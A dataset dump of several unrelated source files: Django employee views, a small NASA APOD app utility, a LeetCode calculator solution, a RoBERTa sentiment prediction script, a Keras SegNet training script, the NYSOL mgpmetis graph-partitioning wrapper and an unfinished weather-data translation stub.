User.objects.create(username=username,en=en,first_name=first_name,last_name=last_name,\n\t\t\t\t\t\t\t\t\tsection=objSection,company=objCompany)\n\n\t\t\tresponse_msg={'msg':'successful',\n\t\t\t\t\t\t\t'successful':True,\n\t\t\t\t\t\t\t'user': username}\n\t\texcept OSError as err:\n\t\t\tresponse_msg={'msg':\"OS error: {0}\".format(err),\n\t\t\t\t\t\t\t'created':False}\n\t\texcept ValueError:\n\t\t\tresponse_msg={'msg':\"Object of type 'type' is not JSON serializable\",\n\t\t\t\t\t\t\t'created':False}\n\n\t\texcept TypeError:\n\t\t\tresponse_msg={'msg':sys.exc_info()[0],\n\t\t\t\t\t\t\t'created':False}\n\t\texcept:\n\t\t\tresponse_msg={'msg':sys.exc_info()[0],\n\t\t\t\t\t\t\t'created':False}\n\n\treturn JsonResponse (response_msg)\n\n@api_view([\"POST\"])\ndef login(request):\n\tusername = request.data.get(\"username\")\n\tpassword = request.data.get(\"password\")\n\n\tuser = authenticate(username=username, password=password)\n\tif not user:\n\t\treturn Response({\"error\": \"Login failed\"}, status=HTTP_401_UNAUTHORIZED)\n\n\ttoken, _ = Token.objects.get_or_create(user=user)\n\treturn 
Response({\"token\": token.key})\n\n\nclass UserListView(LoginRequiredMixin,ListView):\n\tmodel = User\n\nclass UserDetailView(LoginRequiredMixin,DetailView):\n\tmodel = User\n\tcontext_object_name = 'emp'\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super().get_context_data(**kwargs)\n\t\tmode \t\t\t\t= self.request.GET.get('mode', None)\n\t\treport_date \t\t= timezone.now()\n\t\tcontext['now'] \t\t= report_date\n\t\tcontext['mode'] \t= mode\n\t\treturn context\n\n\tdef get(self, request, *args, **kwargs):\n\t\ttry:\n\t\t\tself.object = self.get_object()\n\t\t\tuser \t\t= self.request.user\n\t\t\tsection \t= user.section\n\t\t\tdepartment \t= section.department\n\t\t\t# # print ('Object Department %s' % self.object.section.department)\n\t\t\t# # print ('Request Department %s' % department)\n\t\t\tif (self.object.section.department != department) and not user.groups.filter(name__in=['HR staff']).exists() :\n\t\t\t\treturn HttpResponseForbidden()\n\t\texcept Http404:\n\t\t\t# redirect here\n\t\t\treturn redirect('\\'')\n\t\tcontext = self.get_context_data(object=self.object)\n\t\treturn self.render_to_response(context)","sub_path":"employee/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"592591371","text":"# Library imports\nimport datetime\n\n\n# Custom files that we write from scratch:\n# app.py, api_calls.py, data.py, sandbox.py, utils.py\n# Each file has it's description in it\n\n# utils.py:\n# This page has the general functions/variables we've implemented\n\ndef getTodayString():\n # Returns today as a string in \"YYYY-mm-dd\" format\n # Used multiple times in api_calls\n date = datetime.datetime.now()\n return str(date.year) + \"-\" + str(date.month) + \"-\" + str(date.day)\n\n\ndef getFreeID(dictionary):\n # Gets dictionary as input, returns the first integer that is not being used\n # Used in data.api[\"favorites\"] to fina a free slot\n key = 0\n while key in dict.keys(dictionary):\n key += 1\n return key\n\n\n# The Json on the main menu\nmainMenu = {\n \"Main Menu\": {\n \"Possible routes that are available\": {\n \"/\": \"This Page\",\n \"/apod\": {\n \"/apod\": \"apod.html with the Astronomical Picture of the Day of today\",\n \"/apod/\": \"apod.html with the Astronomical Picture of the Day of \",\n },\n \"/api/apod\": {\n \"/api/apod\": \"Get the \\\"Astronomical Picture of the Day API\\\" of today\",\n \"/api/apod/\": \"Get the \\\"Astronomical Picture of the Day API\\\" of \",\n },\n \"/api/favorites\": {\n \"/api/favorites\": \"GET the favorites\",\n \"/api/favorites/add\": \"POST a json into favorites\",\n \"/api/favorites/remove\": \"REMOVE an id from favorites\"\n },\n \"/api/news\": {\n \"/api/news\": \"Get the \\\"news API\\\" of today\",\n \"/api/news/\": \"Get the \\\"news API\\\" of \",\n },\n \"Errors\": {\n \"/\": {\"404\": \"not found\"},\n }\n }\n }\n}\n","sub_path":"practice-app/cmpe352API/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"490117273","text":"\"\"\"\n // Time Complexity :O(n)\n // Space Complexity :O(n)\n // Did this code successfully run on Leetcode : YES\n // Any problem you faced while coding this : NA\n if s[i] is numeric, calculate number\n if s[i] is either + or - sign;push the number in stack\n if s[i] is either * or /; pop from the stack, perform operation and push the 
result\n if i is last index of s; push the element as it is\n In the end-> add all the elements of stack untill it's empty\n\"\"\"\nclass Solution:\n def calculate(self, s: str) -> int:\n if s is None or len(s) == 0: return 0\n number = 0\n lastsign = \"+\"\n stack = []\n result = 0\n n = len(s) - 1\n for i in range(len(s)):\n if s[i].isdigit() == True:\n number = number*10+int(s[i])\n if (s[i].isdigit() == False and s[i] !=\" \") or i ==n:\n if lastsign == \"+\": stack.append(number)\n elif lastsign == \"-\": stack.append(-number)\n elif lastsign == \"*\": stack.append(stack.pop()*number)\n elif lastsign == \"/\": stack.append(int(stack.pop()/number))\n number = 0\n lastsign = s[i]\n\n while stack:\n result += stack.pop()\n return result\n","sub_path":"99BasicCalculatorII.py","file_name":"99BasicCalculatorII.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"46075521","text":"from fairseq.models.roberta import RobertaModel\nfrom nltk.tokenize.treebank import TreebankWordTokenizer\ntokenizer = TreebankWordTokenizer()\n\n\nimport sys\n\nmodel = sys.argv[1]\nassert model == \"SST-2\"\n\nroberta = RobertaModel.from_pretrained(\n f'checkpoints_{model}/',\n checkpoint_file='checkpoint_best.pt',\n data_name_or_path=f'{model}-bin'\n)\n\nimport torch\nlabel_fn = lambda label: roberta.task.label_dictionary.string(\n torch.LongTensor([label + roberta.task.label_dictionary.nspecial])\n)\nncorrect, nsamples = 0, 0\nroberta.cuda()\nroberta.eval()\nevaluatedSoFar = set()\nwith open('../Robustness-Low-Synergy-and-Cheap-Computation/experiments/202-sst2/Submiterator-master/provided-alternatives_labeled.tsv', \"w\") as outFile:\n with open(f'../Robustness-Low-Synergy-and-Cheap-Computation/experiments/202-sst2/Submiterator-master/provided-alternatives.tsv', 'r') as fin:\n while True:\n line = next(fin).strip()\n try:\n original, subsets, neighbor = line.strip().split(\"\\t\")\n except ValueError:\n print(\"ValueError: \", line)\n continue\n for alternative in [original, neighbor]:\n alternativeOriginal = alternative.strip()\n\n alternatives = [\" \".join(tokenizer.tokenize(alternative))]\n alternatives = alternatives[:1]\n for i in range(1):\n alternatives[i] = alternatives[i].strip()\n\n \n \n sentences = alternatives\n if alternativeOriginal in evaluatedSoFar:\n continue\n evaluatedSoFar.add(alternativeOriginal)\n if len(evaluatedSoFar) % 100 == 0:\n print(len(evaluatedSoFar), sentences)\n tokens = roberta.encode(sentences[0])\n prediction = roberta.predict('sentence_classification_head', tokens)\n prediction_label = label_fn(prediction.argmax().item())\n prediction = [float(x) for x in prediction.view(-1)]\n print(\"\\t\".join([alternativeOriginal, str(prediction[1]), prediction_label]), file=outFile)\n# except StopIteration:\n # pass\n","sub_path":"getPredictionsSST2Alternatives_HumanGenerated_202-sst.py","file_name":"getPredictionsSST2Alternatives_HumanGenerated_202-sst.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"190648510","text":"import numpy as np\nimport tensorflow as tf\nfrom keras import layers, Input, Model, Sequential, optimizers\nfrom keras.layers import Reshape, Merge, Lambda\nfrom keras.layers import Layer, Dense, Dropout, Activation, Flatten, Reshape, Permute\nfrom keras.layers import BatchNormalization\nfrom keras.layers import Conv2D, MaxPooling2D, UpSampling2D, ZeroPadding2D\nfrom 
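A few spot checks of the stack-based evaluator above, with the Solution class from that record in scope; expected values worked out by hand:

# Spot checks for calculate(); assumes the Solution class above is defined.
s = Solution()
assert s.calculate('3+2*2') == 7      # multiplication binds first
assert s.calculate(' 3/2 ') == 1      # int() truncates toward zero
assert s.calculate(' 3+5 / 2 ') == 5  # 3 + (5 // 2)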
keras.optimizers import Adam, SGD\nfrom keras.preprocessing import image\nimport keras.backend as K\nfrom keras.engine import Layer\nfrom keras.utils import multi_gpu_model, np_utils\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\n\n#checkpoint = ModelCheckpoint('seg.h5', monitor='val_loss', verbose=1, save_best_only=True, mode='max')\n#earlystop = EarlyStopping(monitor='val_loss', patience=5, mode='max')\n#callback_list = [earlystop]\nimport os\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0,1,2,3\"\n\nGPU_MEMORY_FRACTION = 1.0\nDATA_SHAPE = 224\n# hyparameters to tune\nBATCH_SIZE = 128\nLEARNING_RATE = 5e-6\nEPOCHS = 200\nCLASS_WEIGHT = np.array([1,10])\n\ndef segnet(shape=224):\n kernel = 3\n filter_size = 64\n pad = 1\n pool_size = 2\n model = Sequential()\n model.add(Layer(input_shape=(shape , shape ,3)))\n # encoder\n model.add(ZeroPadding2D(padding=(pad,pad)))\n model.add(Conv2D(filter_size, (kernel, kernel), padding='valid'))\n model.add(BatchNormalization())\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(pool_size, pool_size)))\n model.add(ZeroPadding2D(padding=(pad,pad)))\n model.add(Conv2D(128, (kernel, kernel), padding='valid'))\n model.add(BatchNormalization())\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(pool_size, pool_size)))\n model.add(ZeroPadding2D(padding=(pad,pad)))\n model.add(Conv2D(256, (kernel, kernel), padding='valid'))\n model.add(BatchNormalization())\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(pool_size, pool_size)))\n model.add(ZeroPadding2D(padding=(pad,pad)))\n model.add(Conv2D(512, (kernel, kernel), padding='valid'))\n model.add(BatchNormalization())\n model.add(Activation('relu'))\n # decoder\n model.add( ZeroPadding2D(padding=(pad,pad)))\n model.add( Conv2D(512, (kernel, kernel), padding='valid'))\n model.add( BatchNormalization())\n model.add( UpSampling2D(size=(pool_size,pool_size)))\n model.add( ZeroPadding2D(padding=(pad,pad)))\n model.add( Conv2D(256, (kernel, kernel), padding='valid'))\n model.add( BatchNormalization())\n model.add( UpSampling2D(size=(pool_size,pool_size)))\n model.add( ZeroPadding2D(padding=(pad,pad)))\n model.add( Conv2D(128, (kernel, kernel), padding='valid'))\n model.add( BatchNormalization())\n model.add( UpSampling2D(size=(pool_size,pool_size)))\n model.add( ZeroPadding2D(padding=(pad,pad)))\n model.add( Conv2D(filter_size, (kernel, kernel), padding='valid'))\n model.add( BatchNormalization())\n model.add(Conv2D(2, (1, 1), padding='valid',))\n model.outputHeight = model.output_shape[-2]\n model.outputWidth = model.output_shape[-3] \n model.add(Activation('softmax'))\n return model\n\ndef config_keras_backend(fraction):\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n config.gpu_options.per_process_gpu_memory_fraction = fraction \n sess = tf.Session(config=config)\n K.set_session(sess)\n \ndef weighted_categorical_crossentropy(weights):\n weights = K.variable(weights)\n def loss(y_true, y_pred):\n y_pred /= K.sum(y_pred, axis=-1, keepdims=True)\n y_pred = K.clip(y_pred, K.epsilon(), 1 - K.epsilon())\n loss = y_true * K.log(y_pred) * weights\n loss = -K.sum(loss, -1)\n return loss\n return loss\n \n \nif __name__ == '__main__':\n print(\"********** loading labels **********\")\n train_labels = np.load('/home/mc16/pre_data/train_label_%s.npy'%DATA_SHAPE)\n val_labels = np.load('/home/mc16/pre_data/val_label_%s.npy'%DATA_SHAPE)\n \n print(\"********** loading images 
**********\")\n train_images = np.load('/home/mc16/pre_data/train_image_%s.npy'%DATA_SHAPE)\n val_images = np.load('/home/mc16/pre_data/val_image_%s.npy'%DATA_SHAPE)\n \n print(\"********** building model **********\")\n config_keras_backend(GPU_MEMORY_FRACTION)\n seg = segnet(DATA_SHAPE)\n parallel_seg = multi_gpu_model(seg,gpus=4)\n \n print('********** training... **********')\n loss = weighted_categorical_crossentropy(CLASS_WEIGHT)\n adam = Adam(lr=LEARNING_RATE)\n parallel_seg.compile(loss=loss, optimizer=adam, metrics=['accuracy'])\n parallel_seg.fit(x = train_images, \n y = train_labels,\n batch_size = BATCH_SIZE,\n epochs = EPOCHS,\n verbose = 1,\n validation_data = (val_images, val_labels),\n shuffle = True)\n print('********** saveing mdoel **********')\n seg.save('seg_1.h5')","sub_path":"model7_segcrf/s612.py","file_name":"s612.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"88954104","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\nimport shutil\n\nimport nysol.mcmd as nm\nimport nysol.util as nu\nimport nysol.util.margs as margs\nfrom nysol.util.mtemp import Mtemp\nfrom nysol.util.mrecount import mrecount\n\nfrom nysol.mining import extcore as extMining\n\n\nclass mgpmetis(object):\n\n\thelpMSG=\"\"\"\n----------------------------\nmgpmetis.rb version #{$version}\n----------------------------\n概要) METISを利用したグラフ分割(クラスタリング)\n特徴) 1) 節点数をできるだけ同じようにして、枝のカット数を最小化するように分割する。\n 2) 節点と枝に重みを与えることも可能。\n 3) 一つの節点が複数のクラスタに属することはない(ハードクラスタリング)。\n 4) 内部ではgpmetisコマンドをコールしている。\n用法) mgpmetis.rb kway= [ptype=rb|kway] ei= [ef=] [ew=] [ni=] [nf=] [nw=] [o=]\n [balance=] [ncuts=] [dat=] [map=] [-noexe] [--help]\n\n ファイル関連\n ei= : 枝ファイル名(節点ペア)【必須】\n ef= : 枝ファイル上の節点ペア項目名(2項目のみ)【デフォルト:\"node1,node2\"】\n ew= : 枝ファイル上の重み項目名(1項目のみ)【オプション:省略時は全ての枝の重みを1と見なす】\n : 重みは整数で指定しなければならない。\n ni= : 節点ファイル名【オプション*注1】\n nf= : 節点ファイル上の節点項目名(1項目のみ)【デフォルト:\"node\"】\n nw= : 節点ファイル上の重み項目名(複数項目指定可)【オプション:省略時は全ての重みを1と見なす】\n : 重みは整数で指定しなければならない。\n o= : 出力ファイル名【オプション:defaultは標準出力】\n\n 動作の制御関連\n kway= : 分割数【必須】\n ptype= : 分割アルゴリズム【デフォルト:kway】\n balance= : 分割アンバランスファクタ【デフォルト: ptype=rbの時は1.001、ptype=kwayの時は1.03】\n ncuts= : 分割フェーズで、初期値を変えて試行する回数【オプション:default=1】\n seed= : 乱数の種(0以上の整数)【オプション:default=-1(時間依存)】\n\n gpmetis用のデータ生成\n dat= : 指定されたファイルにgpmetisコマンド用のデータを出力する。\n map= : 指定されたファイルにgpmetisコマンド用の節点番号とi=上の節点名のマッピングデータを出力する。\n -noexe : 内部でgpmetisを実行しない。dat=,map=の出力だけが必要な場合に指定する。\n\n その他\n\t--help : ヘルプの表示\n\n 注1:節点ファイルは、孤立節点(一つの節点からのみ構成される部分グラフ)がある場合、\n もしくは節点の重みを与えたいときのみ指定すればよい。\n 注2:節点もしくは枝の重みを与えない時は、内部的に全ての重みを1として計算する。\n\n必要なソフトウェア)\n gpmetis(metis-5.1.0)\n インストールは以下のURLより行う。\n http://glaros.dtc.umn.edu/gkhome/metis/metis/download\n\n入力データ)\n 節点ペアのCSVファイル(ファイル名はei=にて指定)\n\t例:\n node1,node2,weight\n a,b,1\n a,c,2\n a,e,1\n b,c,2\n b,d,1\n c,d,2\n c,e,3\n d,f,2\n d,g,5\n e,f,2\n f,g,6\n\n\n出力データ)\n 節点とクラスタ番号のCSVデータ(ファイル名はo=にて指定)\n node,cluster\n a,2\n b,1\n c,2\n d,0\n e,0\n f,0\n g,1\n\n# Copyright(c) NYSOL 2012- All Rights Reserved.\n\n\"\"\"\n\n\tverInfo=\"version=0.1\"\n\n\tparamter = {\t\n\t\t\"ei\":\"str\",\n\t\t\"ef\":\"fld\", # \"str\"\n\t\t\"ew\":\"str\",\n\t\t\"ni\":\"str\",\n\t\t\"nf\":\"fld\",\n\t\t\"nw\":\"str\",\n\t\t\"o\":\"file\",\n\t\t\"kway\":\"int\",\n\t\t\"ptype\":\"str\",\n\t\t\"balance\":\"float\",\n\t\t\"ncuts\":\"int\",\n\t\t\"dat\":\"file\",\n\t\t\"map\":\"str\",\n\t\t\"seed\":\"int\",\n\t\t\"verbose\":\"bool\",\n\t\t\"noexe\":\"bool\"\n\t}\n\tparamcond = {\t\n\t\t\"hissu\": 
[\"kway\",\"ei\"]\n\t}\t\n\n\tdef help():\n\t\tprint(mgpmetis.helpMSG) \n\n\tdef ver():\n\t\tprint(mgpmetis.verInfo)\n\n\tdef __param_check_set(self , kwd):\n\n\t\t# 存在チェック\n\t\tfor k,v in kwd.items():\n\t\t\tif not k in mgpmetis.paramter\t:\n\t\t\t\traise( Exception(\"KeyError: {} in {} \".format(k,self.__class__.__name__) ) )\n\n\t\tself.msgoff = True\n\n\n\t\tself.kway = int(kwd[\"kway\"])\n\t\tself.oFile = kwd[\"o\"] if \"o\" in kwd else None\n\t\tself.eFile = kwd[\"ei\"]\n\t\tself.nFile = kwd[\"ni\"] if \"ni\" in kwd else None\n\t\tself.dFile = kwd[\"dat\"] if \"dat\" in kwd else None\n\t\tself.mFile = kwd[\"map\"] if \"map\" in kwd else None\n\n\t\tif \"ef\" in kwd :\n\t\t\tef0 = kwd[\"ef\"].split(\",\")\n\t\t\tself.ef1 = ef0[0]\n\t\t\tself.ef2 = ef0[1] \n\t\telse:\n\t\t\tself.ef1 = \"node1\"\n\t\t\tself.ef2 = \"node2\" \n\t\t\t\n\t\tself.ew = kwd[\"ew\"] if \"ew\" in kwd else None\n\t\tself.nf = kwd[\"nf\"] if \"nf\" in kwd else None\n\t\tself.nw = kwd[\"nw\"] if \"nw\" in kwd else None\n\t\tself.ncon=0\n\t\tif self.nw :\n\t\t\tself.ncon = len(self.nw.split(\",\"))\n\n\n\t\t# ---- other paramters\n\t\tself.ptype = kwd[\"ptype\"] if \"ptype\" in kwd else \"kway\" \n\t\tself.ncuts = int(kwd[\"ncuts\"]) if \"ncuts\" in kwd else 1 \n\t\tself.balance = float(kwd[\"balance\"]) if \"balance\" in kwd else None\n\t\tself.ufactor = None\n\t\tif self.balance :\n\t\t\tif self.balance < 1.0 :\n\t\t\t\traise( Exception(\"balance expect range (> 1.0)\" ) )\n\t\t\tself.ufactor = int((self.balance-1.0)*1000)\n\t\telse:\n\t\t\tif self.ptype==\"kway\":\n\t\t\t\tself.ufactor=30\n\t\t\telse:\n\t\t\t\tself.ufactor=1\n\n\t\tself.seed = int(kwd[\"seed\"]) if \"seed\" in kwd else -1\n\t\tself.noexe = kwd[\"noexe\"] if \"noexe\" in kwd else False\n\t\tself.verbose = kwd[\"verbose\"] if \"verbose\" in kwd else False\n\t\t\t\n\t\tself.workf = nu.Mtemp()\n\n\tdef __cmdline(self):\n\t\tcmdline = self.__class__.__name__\n\t\tfor k,v in self.args.items():\n\t\t\tif type(v) is bool :\n\t\t\t\tif v == True :\n\t\t\t\t\tcmdline += \" -\" + str(k)\n\t\t\telse:\n\t\t\t\tcmdline += \" \" + str(k) + \"=\" + str(v)\n\t\treturn cmdline \n\n\tdef __init__(self,**kwd):\n\t\t#パラメータチェック\n\t\tself.args = kwd\n\t\tself.__param_check_set(kwd)\n\n\n\n\t# ============\n\t# entry point\n\tdef run(self,**kw_args):\n\n\t\tos.environ[\"KG_VerboseLevel\"] = \"2\"\n\t\tif \"msg\" in kw_args:\n\t\t\tif kw_args[\"msg\"] == \"on\":\n\t\t\t\tos.environ['KG_ScpVerboseLevel'] = \"3\"\n\n\n\t\ttemp=Mtemp()\n\t\txxedge = temp.file()\n\t\txxnode = temp.file()\n\t\txxnam2num = temp.file()\n\t\txxnum2nam = temp.file()\n\t\txxebase = temp.file()\n\t\txxbody = temp.file()\n\n\t\te1=None\n\t\tif self.ew :\n\t\t\te1 <<= nm.mcut(f=\"%s:__node1,%s:__node2,%s:__weight\"%(self.ef1,self.ef2,self.ew),i=self.eFile)\n\t\telse:\n\t\t\te1 <<= nm.mcut(f=\"%s:__node1,%s:__node2\"%(self.ef1,self.ef2),i=self.eFile)\n\n\t\te1 <<= nm.muniq(k=\"__node1,__node2\")\n\n\n\t\te2 = nm.mfldname(i=e1,f=\"__node2:__node1,__node1:__node2\")\n\n\t\tfe =None\n\t\tfe <<= nm.muniq(k=\"__node1,__node2\",i=[e1,e2],o=xxedge)\n\t\tfe.run()\n\t\t\n\t\t# cleaning the node data (remove duplicate nodes)\n\t\tfn=None\n\t\tif self.nFile :\n\t\t\tif self.nw :\n\t\t\t\tfn <<= nm.mcut(f=\"%s:__node,%s\"%(self.nf,self.nw),i=self.nFile)\n\t\t\telse:\n\t\t\t\tfn <<= nm.mcut(f=\"%s:__node\"%(self.nf),i=self.nFile)\n\n\t\t\tfn <<= nm.muniq(k=\"__node\",o=xxnode)\n\n\t\telse:\n\t\t\txxen1 = nm.mcut(f=\"__node1:__node\",i=xxedge)\n\t\t\txxen2 = nm.mcut(f=\"__node2:__node\",i=xxedge)\n\t\t\tfn <<= 
nm.muniq(k=\"__node\",o=xxnode,i=[xxen1,xxen2])\n\n\t\tfn.run()\n\n\n\t\t# 節点名<=>節点番号変換表の作成\n\t\tfmap = None\n\t\tfmap <<= nm.mcut(f=\"__node\" , i=xxnode)\n\t\tfmap <<= nm.mnumber(a=\"__num\",S=1,q=True,o=xxnam2num)\n\t\tfmap <<= nm.msortf(f=\"__num\",o=xxnum2nam)\n\t\tfmap.run()\n\n\t\t# 節点ファイルが指定された場合は枝ファイルとの整合性チェック\n\t\tif self.nFile :\n\t\t\tncheck = nm.mcut(f=\"__node1:__node\" , i=xxedge)\n\t\t\tncheck <<= nm.mcommon(k=\"__node\" , m=xxnam2num,r=True)\n\t\t\tnmatch = ncheck.run()\n\t\t\tif len(nmatch) > 0 :\n\t\t\t\traise Exception(\"#ERROR# the node named '%s' in the edge file doesn't exist in the node file.\"%(nmatch[0][0]))\n\n\n\t\t# metisのグラフファイルフォーマット\n\t\t# 先頭行n m [fmt] [ncon]\n\t\t# n: 節点数、m:枝数、ncon: 節点weightの数\n\t\t# 1xx: 節点サイズ有り (not used, meaning always \"0\")\n\t\t# x1x: 節点weight有り\n\t\t# xx1: 枝がweightを有り\n\t\t# s w_1 w_2 ... w_ncon v_1 e_1 v_2 e_2 ... v_k e_k\n\t\t# s: 節点サイズ (節点サイズは利用不可)\n\t\t# w_x: 節点weight\n\t\t# v_x: 接続のある節点番号(行番号)\n\t\t# e_x: 枝weight\n\n\t\t# --------------------\n\t\t# generate edge data using the integer numbered nodes\n\t\t#fnnum = None\n\t\tfnnum = nm.mcut(f=\"__num:__node_n1\",i=xxnam2num) # {xxnnum}\n\n\t\tfenum = None\n\t\tfenum <<= nm.mjoin(k=\"__node1\", K=\"__node\", f=\"__num:__node_n1\", m=xxnam2num , i=xxedge)\n\t\tfenum <<= nm.mjoin(k=\"__node2\", K=\"__node\", f=\"__num:__node_n2\", m=xxnam2num)\n\t\tfenum <<= nm.msortf(f=\"__node_n1\") #{xxenum}\n\n\n\n\t\tfebase = None\n\t\tfebase <<= nm.mnjoin(k=\"__node_n1\",m=fenum,i=fnnum,n=True)\n\t\tfebase <<= nm.msortf(f=\"__node_n1%n,__node_n2%n\",o=xxebase) #{xxebase}\"\n\t\tfebase.run()\n\t\t\n\t\tfbody = None\n\t\tif not self.ew :\n\t\t\tfbody <<= nm.mcut(f=\"__node_n1,__node_n2\", i=xxebase)\n\t\t\tfbody <<= nm.mtra(k=\"__node_n1\",f=\"__node_n2\" ,q=True )\n\t\t\tfbody <<= nm.mcut(f=\"__node_n2\", nfno=True, o=xxbody)\n\n\t\t# if ew= is specified, merge the weight data into the edge data.\n\t\telse:\n\t\t\tfebody = None\n\t\t\tfebody <<= nm.mcut(f=\"__node_n1,__node_n2:__v\", i=xxebase)\n\t\t\tfebody <<= nm.mnumber(S=0,I=2,a=\"__seq\" ,q=True)\n\t\t\n\t\t\tfwbody = None\n\t\t\tfwbody <<= nm.mcut(f=\"__node_n1,__weight:__v\",i=xxebase)\n\t\t\tfwbody <<= nm.mnumber(S=1,I=2,a=\"__seq\" ,q=True)\n\n\t\t\tfbody <<= nm.msortf(f=\"__seq%n\",i=[febody,fwbody])\n\t\t\tfbody <<= nm.mtra(k=\"__node_n1\" ,f=\"__v\" ,q=True )\n\t\t\tfbody <<= nm.mcut(f=\"__v\" ,nfno=True,o=xxbody)\n\n\t\tfbody.run()\n\t\t# xxbody\n\t\t# 2 7 3 8 5 9\n\t\t# 1 7 3 10 5 11 7 12\n\t\t# 1 8 2 10 4 13 7 14\n\n\t\t# --------------------\n\t\t# generate node data using integer number\n\t\tif self.nFile and self.nw :\n\t\t\t# xxnode\n\t\t\t# __node,v1,v2\n\t\t\t# a,1,1\n\t\t\t# b,1,1\n\t\t\t# c,1,1\n\t\t\txxnbody = temp.file()\n\t\t\txxnbody1 = temp.file()\n\t\t\tfnbody = None\n\t\t\tfnbody <<= nm.mjoin(k=\"__node\", f=\"__num\", i=xxnode ,m=xxnam2num)\n\t\t\tfnbody <<= nm.msortf(f=\"__num%n\")\n\t\t\tfnbody <<= nm.mcut(f=self.nw,nfno=True)\n\t\t\tfnbody <<= nm.cmd(\"tr ',' ' ' \") # tricky!!\n\t\t\tfnbody <<= nm.mwrite(o=xxnbody)\n\t\t\tfnbody.run()\n\t\t\t# xxnbody\n\t\t\t# 1 1\n\t\t\t# 1 1\n\t\t\t# 1 1\n\t\t\t# paste the node weight with edge body\n\t\t\tfnbody1 = None\n\t\t\tfnbody1 <<= nm.mpaste(nfn=True,m=xxbody , i=xxnbody)\n\t\t\tfnbody1 <<= nm.cmd(\"tr ',' ' ' \") \n\t\t\tfnbody1 <<= nm.mwrite(o=xxnbody1)\n\t\t\tfnbody1.run()\n\t\t\tos.system(\"mv %s %s\"%(xxnbody1,xxbody))\n\n\t\t# xxbody\n\t\t# 1 1 2 7 3 8 5 9\n\t\t# 1 1 1 7 3 10 5 11 7 12\n\t\t# 1 1 1 8 2 10 4 13 7 
14\n\n\n\t\teSize=mrecount(i=xxedge)\n\t\teSize/=2\n\t\tnSize=mrecount(i=xxnode)\n\t\tnwFlag = 1 if self.nw else 0\n\t\tewFlag = 1 if self.ew else 0\n\t\t\n\t\tfmt=\"0%d%d\"%(nwFlag,ewFlag)\n\n\t\txxhead = temp.file()\n\t\txxgraph= temp.file()\n\t\t\t\t\n\t\tos.system(\"echo '%d %d %s %d' > %s\"%(nSize,eSize,fmt,self.ncon,xxhead))\n\t\tos.system(\"cat %s %s > %s\"%(xxhead,xxbody,xxgraph))\n\n\t\tif self.mFile :\n\t\t\tnm.mfldname(f=\"__num:num,__node:node\",i=xxnum2nam,o=self.mFile).run()\n\t\t\t\n\t\tif self.dFile :\n\t\t\tos.system(\"cp %s %s\"%(xxgraph,self.dFile))\n\t\t\t\n\t\tif not self.noexe:\n\t\t\tif self.verbose :\n\t\t\t\tos.system(\"gpmetis -seed=%d -ptype=%s -ncuts=%d -ufactor=%d %s %d\"%(self.seed,self.ptype,self.ncuts,self.ufactor,xxgraph,self.kway))\n\t\t\telse:\n\t\t\t\tos.system(\"gpmetis -seed=%d -ptype=%s -ncuts=%d -ufactor=%d %s %d > /dev/null\"%(self.seed,self.ptype,self.ncuts,self.ufactor,xxgraph,self.kway))\n\t\t\timport glob\n\t\t\tif len(glob.glob(xxgraph+\".part.*\")) == 0:\n\t\t\t\traise Exception(\"#ERROR# command `gpmetis' didn't output any results\")\n\n\t\t\t# 節点名を数字から元に戻す\n\t\t\t# #{xxgraph}.part.#{kway}\n\t\t\t# 1\n\t\t\t# 0\n\t\t\t# 1\n\t\t\tfo = None\t\n\t\t\tfo <<= nm.mcut(f=\"0:cluster\", nfni=True,i=xxgraph+\".part.\"+str(self.kway))\n\t\t\tfo <<= nm.mnumber(S=1,a=\"__num\",q=True)\n\t\t\tfo <<= nm.mjoin(k=\"__num\",f=\"__node\",m= xxnum2nam)\n\t\t\tfo <<= nm.msortf(f=\"__node,cluster\")\n\t\t\tif self.nf :\n\t\t\t\tfo <<= nm.mcut(f=\"__node:%s,cluster\"%(self.nf),o=self.oFile)\n\t\t\telse:\n\t\t\t\tfo <<= nm.mcut(f=\"__node:node,cluster\",o=self.oFile)\n\t\t\tfo.run()\n\n\t\tnu.mmsg.endLog(self.__cmdline())\n","sub_path":"nysol/mining/mgpmetis.py","file_name":"mgpmetis.py","file_ext":"py","file_size_in_byte":11910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"572907644","text":"\"\"\"\nGFS data translation handlers\n\"\"\"\n\n# mypy: ignore-errors\n\nraise NotImplementedError()\n\nfrom typing import List\n\nimport avwx.parsing.translate.base as _trans\nfrom avwx.structs import (\n GfsPeriod,\n GfsPeriodTrans,\n MavData,\n MavPeriodTrans,\n MexData,\n MexPeriodTrans,\n Units,\n)\n\n\ndef _gfs_shared(\n line: GfsPeriod, units: Units, dataobj: GfsPeriodTrans\n) -> GfsPeriodTrans:\n \"\"\"\"\"\"\n data = {}\n data[\"temperature\"] = _trans.temperature(line.temperature, units.temperature)\n data[\"dewpoint\"] = _trans.temperature(line.dewpoint, units.temperature)\n data[\"cloud\"] = None\n return dataobj(**data)\n\n\ndef translate_mav(wxdata: MavData, units: Units) -> List[MavPeriodTrans]:\n \"\"\"Returns translations for a TafData object\"\"\"\n data = []\n for line in wxdata.forecast:\n _data = _gfs_shared(line, units, MavPeriodTrans)\n return data\n\n\ndef translate_mex(wxdata: MexData, units: Units) -> List[MexPeriodTrans]:\n 